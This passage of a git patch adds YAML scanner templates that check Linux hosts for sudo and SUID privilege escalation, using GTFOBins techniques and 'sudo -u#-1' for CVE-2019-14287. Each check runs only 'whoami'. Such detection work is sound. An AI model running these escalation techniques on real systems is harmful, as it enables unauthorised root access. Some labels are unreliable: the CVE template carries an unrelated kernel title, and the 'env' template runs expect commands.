From b2e48fb11f0879d7063e7f766580b373415a1b3c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa Date: Wed, 13 Dec 2023 22:07:24 +0700 Subject: [PATCH 001/285] feat: added privesc --- code/cves/2023/CVE-2019-14287.yaml | 38 +++++++++++++ .../binary/privilege-escalation-aa-exec.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-ash.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-awk.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-bash.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-cdist.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-choom.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-cpulimit.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-csh.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-csvtool.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-dash.yaml | 46 ++++++++++++++++ .../linux/binary/privilege-escalation-dc.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-distcc.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-elvish.yaml | 46 ++++++++++++++++ .../privilege-escalation-encscript.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-env.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-expect.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-find.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-fish.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-flock.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-gawk.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-grc.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-ionice.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-julia.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-lftp.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-ltrace.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-lua.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-mawk.yaml | 46 ++++++++++++++++ .../privilege-escalation-multitime.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-mysql.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-nawk.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-nice.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-node.yaml | 54 +++++++++++++++++++ .../binary/privilege-escalation-nsenter.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-perl.yaml | 54 +++++++++++++++++++ .../binary/privilege-escalation-pexec.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-php.yaml | 54 +++++++++++++++++++ .../binary/privilege-escalation-posh.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-python.yaml | 54 +++++++++++++++++++ .../binary/privilege-escalation-rake.yaml | 46 ++++++++++++++++ .../linux/binary/privilege-escalation-rc.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-rlwrap.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-rpm.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-rpmdb.yaml | 46 ++++++++++++++++ .../privilege-escalation-rpmverify.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-ruby.yaml | 54 +++++++++++++++++++ .../privilege-escalation-run-parts.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-sash.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-slsh.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-socat.yaml | 46 ++++++++++++++++ .../privilege-escalation-softlimit.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-sqlite3.yaml | 46 ++++++++++++++++ .../privilege-escalation-ssh-agent.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-sshpass.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-stdbuf.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-strace.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-tar.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-tcsh.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-time.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-timeout.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-tmate.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-torify.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-torsocks.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-unshare.yaml | 46 ++++++++++++++++ .../linux/binary/privilege-escalation-vi.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-view.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-vim.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-xargs.yaml | 46 ++++++++++++++++ .../privilege-escalation-xdg-user-dir.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-yash.yaml | 46 ++++++++++++++++ .../binary/privilege-escalation-zsh.yaml | 46 ++++++++++++++++ .../linux/readable-writable-etc-shadow.yaml | 43 +++++++++++++++ .../linux/readable-writable-etc-sudoers.yaml | 43 +++++++++++++++ .../linux/sudo-nopasswd.yaml | 26 +++++++++ .../linux/writable-etc-passwd.yaml | 31 +++++++++++ 75 files changed, 3441 insertions(+) create mode 100644 code/cves/2023/CVE-2019-14287.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-env.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-find.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-grc.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-ionice.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-julia.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-lftp.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-ltrace.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-lua.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-mawk.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-multitime.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-mysql.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-nawk.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-nice.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-node.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-nsenter.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-perl.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-pexec.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-php.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-posh.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-python.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-rake.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-rc.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-rlwrap.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-rpm.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-rpmdb.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-rpmverify.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-ruby.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-run-parts.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-sash.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-slsh.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-socat.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-softlimit.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-sqlite3.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-ssh-agent.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-sshpass.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-stdbuf.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-strace.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-tar.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-tcsh.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-time.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-timeout.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-tmate.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-torify.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-torsocks.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-unshare.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-vi.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-view.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-vim.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-xargs.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-xdg-user-dir.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-yash.yaml create mode 100644 code/privilege-escalation/linux/binary/privilege-escalation-zsh.yaml create mode 100644 code/privilege-escalation/linux/readable-writable-etc-shadow.yaml create mode 100644 code/privilege-escalation/linux/readable-writable-etc-sudoers.yaml create mode 100644 code/privilege-escalation/linux/sudo-nopasswd.yaml create mode 100644 code/privilege-escalation/linux/writable-etc-passwd.yaml diff --git a/code/cves/2023/CVE-2019-14287.yaml b/code/cves/2023/CVE-2019-14287.yaml new file mode 100644 index 0000000000..25399daf6d --- /dev/null +++ b/code/cves/2023/CVE-2019-14287.yaml @@ -0,0 +1,38 @@ +id: CVE-2019-14287 + +info: + name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel + author: princechaddha + severity: high + description: | + In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287 + - https://www.exploit-db.com/exploits/47502 + metadata: + verified: true + max-request: 2 + vendor: canonical + product: ubuntu_linux + tags: cve,cve2019,sudo,ubuntu,linux,privesc,local + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + - engine: + - sh + - bash + source: | + sudo -u#-1 whoami + + matchers: + - type: dsl + dsl: + - '!contains(code_1_response, "root")' + - 'contains(code_2_response, "root")' + condition: and diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml new file mode 100644 index 0000000000..5d33e08659 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-aa-exec.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-aa-exec + +info: + name: aa-exec - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/aa-exec/ + metadata: + verified: true + tags: code,linux,aa-exec,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + aa-exec whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo aa-exec whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml new file mode 100644 index 0000000000..82d415caa8 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-ash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-ash + +info: + name: Ash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/ash/ + metadata: + verified: true + tags: code,linux,ash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + ash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo ash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml new file mode 100644 index 0000000000..14ea698598 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-awk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-awk + +info: + name: awk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/awk/ + metadata: + verified: true + tags: code,linux,awk,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + awk 'BEGIN {system("whoami")}' + + #SUDO + - engine: + - sh + - bash + source: | + sudo awk 'BEGIN {system("whoami")}' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml new file mode 100644 index 0000000000..1dbef3a18b --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-bash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-bash + +info: + name: Bash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/bash/ + metadata: + verified: true + tags: code,linux,bash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + bash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo bash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml new file mode 100644 index 0000000000..e6fee4f371 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-cdist.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-cdist + +info: + name: Cdist - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/cdist/ + metadata: + verified: true + tags: code,linux,cdist,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + cdist shell -s whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo cdist shell -s whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml new file mode 100644 index 0000000000..6bdb596aeb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-choom.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-choom + +info: + name: choom - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/choom/ + metadata: + verified: true + tags: code,linux,choom,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + choom -n 0 whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo choom -n 0 whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml new file mode 100644 index 0000000000..22596354a6 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-cpulimit.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-cpulimit + +info: + name: CPUlimit - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/cpulimit/ + metadata: + verified: true + tags: code,linux,cpulimit,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + cpulimit -l 100 -f whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo cpulimit -l 100 -f whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml new file mode 100644 index 0000000000..0b59b82c11 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-csh.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-csh + +info: + name: csh - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/csh/ + metadata: + verified: true + tags: code,linux,csh,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + csh -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo csh -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml new file mode 100644 index 0000000000..451c4bd3aa --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-csvtool.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-csvtool + +info: + name: csvtool - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/csvtool/ + metadata: + verified: true + tags: code,linux,csvtool,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + csvtool call 'whoami;false' /etc/passwd + + #SUDO + - engine: + - sh + - bash + source: | + sudo csvtool call 'whoami;false' /etc/passwd + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml new file mode 100644 index 0000000000..65a3ec45ef --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-dash.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-dash + +info: + name: Dash - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/dash/ + metadata: + verified: true + tags: code,linux,dash,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + dash -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo dash -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml new file mode 100644 index 0000000000..bab777f8c4 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-dc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-dc + +info: + name: dc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/dc/ + metadata: + verified: true + tags: code,linux,dc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + dc -e '!whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo dc -e '!whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml new file mode 100644 index 0000000000..fb11f719f0 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-distcc.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-distcc + +info: + name: distcc - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/distcc/ + metadata: + verified: true + tags: code,linux,distcc,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + distcc whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo distcc whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml new file mode 100644 index 0000000000..e21e3bf5dd --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-elvish.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-elvish + +info: + name: elvish - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/elvish/ + metadata: + verified: true + tags: code,linux,elvish,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + elvish -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo elvish -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml new file mode 100644 index 0000000000..69871d1189 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-encscript.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-enscript + +info: + name: enscript - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/enscript/ + metadata: + verified: true + tags: code,linux,enscript,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + enscript /dev/null -qo /dev/null -I 'whoami >&2' + + #SUDO + - engine: + - sh + - bash + source: | + sudo enscript /dev/null -qo /dev/null -I 'whoami >&2' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml new file mode 100644 index 0000000000..5d69084b32 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-env.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-env + +info: + name: env - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/env/ + metadata: + verified: true + tags: code,linux,env,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + expect -c 'spawn whoami;interact' + + #SUDO + - engine: + - sh + - bash + source: | + sudo expect -c 'spawn whoami;interact' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml new file mode 100644 index 0000000000..b6eca30cb7 --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-expect.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-expect + +info: + name: expect - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/expect/ + metadata: + verified: true + tags: code,linux,expect,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + expect -c 'spawn whoami;interact' + + #SUDO + - engine: + - sh + - bash + source: | + sudo expect -c 'spawn whoami;interact' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml new file mode 100644 index 0000000000..09574ac2ad --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-find.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-find + +info: + name: find - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/find/ + metadata: + verified: true + tags: code,linux,find,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + find . -exec whoami \; -quit + + #SUDO + - engine: + - sh + - bash + source: | + sudo find . -exec whoami \; -quit + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml new file mode 100644 index 0000000000..62b32f6ecb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-fish.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-fish + +info: + name: fish - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/fish/ + metadata: + verified: true + tags: code,linux,fish,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + fish -c 'whoami' + + #SUDO + - engine: + - sh + - bash + source: | + sudo fish -c 'whoami' + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml new file mode 100644 index 0000000000..8864b6e9ba --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-flock.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-flock + +info: + name: Flock - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/flock/ + metadata: + verified: true + tags: code,linux,flock,privesc + +self-contained: true +code: + - engine: + - sh + - bash + source: | + whoami + + #SUID + - engine: + - sh + - bash + source: | + flock -u / whoami + + #SUDO + - engine: + - sh + - bash + source: | + sudo flock -u / whoami + + matchers-condition: and + matchers: + - type: word + part: code_1_response + words: + - "root" + negative: true + + - type: dsl + dsl: + - 'contains(code_2_response, "root")' + - 'contains(code_3_response, "root")' + condition: or \ No newline at end of file diff --git a/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml b/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml new file mode 100644 index 0000000000..20348ee4fb --- /dev/null +++ b/code/privilege-escalation/linux/binary/privilege-escalation-gawk.yaml @@ -0,0 +1,46 @@ +id: privilege-escalation-gawk + +info: + name: gawk - Privilege Escalation + author: daffainfo + severity: high + reference: https://gtfobins.github.io/gtfobins/gawk/ + metadata: + verified: true + tags: code,linux,gawk,privesc + +self-contained: true 